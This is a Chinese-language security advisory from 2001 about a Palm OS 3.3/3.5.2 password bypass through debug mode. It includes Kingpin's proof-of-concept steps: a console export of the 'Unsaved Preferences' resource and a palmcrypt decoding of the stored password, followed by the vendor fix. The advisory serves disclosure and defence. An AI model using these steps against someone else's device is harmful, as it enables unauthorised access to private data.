首页 -> 安全研究

安全研究

安全漏洞
Palm OS 调试模式下口令绕过漏洞

发布日期:2001-03-09
更新日期:2001-03-09

受影响系统:

   Palm Palm OS 3.5.2
   Palm Palm OS 3.3
描述:

BUGTRAQ ID: 2429

Palm OS 提供口令保护功能,使得设备所有者可以限制
对敏感数据的访问。

在 Palm OS 的调试模式下,从 Graffiti stylus 界面
访问时任何可以物理访问 PDA 的用户可以绕过口令保护。
因为调试模式下容许摆弄记录、应用、系统口令信息,特
别是可以检索系统口令(密文形式),输入输出数据库和
应用。


<* 来源:Kingpin (kingpin@atstake.com)
         URL: http://www.atstake.com/research/advisories/2001/a030101-1.txt
*>


测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!


Kingpin (kingpin@atstake.com) 提供了下列测试代码:

在调试模式下:

<--- begin console mode screenshot --->

Ready...

>export 0 "Unsaved Preferences"

Unsaved Preferences
Getting info on resource 3 of 3
Exporting resource 3 of 3
Success!!

<--- end console mode screenshot --->

将保存的数据,使用解密程序解密:


<--- begin palmcrypt screenshot --->

E:\>palmcrypt -d
568CD23E994B0F8809021345070413440C08135A3215135DD217EAD3B5DF5563

PalmOS Password Codec
kingpin@atstake.com
@stake Research Labs
http://www.atstake.com/research/
August 2000

0x74 0x65 0x73 0x74                      [test    ]

<--- end palmcrypt screenshot --->


建议:

临时解决办法:

   NSFOCUS建议您不要在Palm上存储敏感信息,并防止非法访问串口。

厂商补丁:

Palm OS 4.0 将会解决这个问题。

浏览次数:3656
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障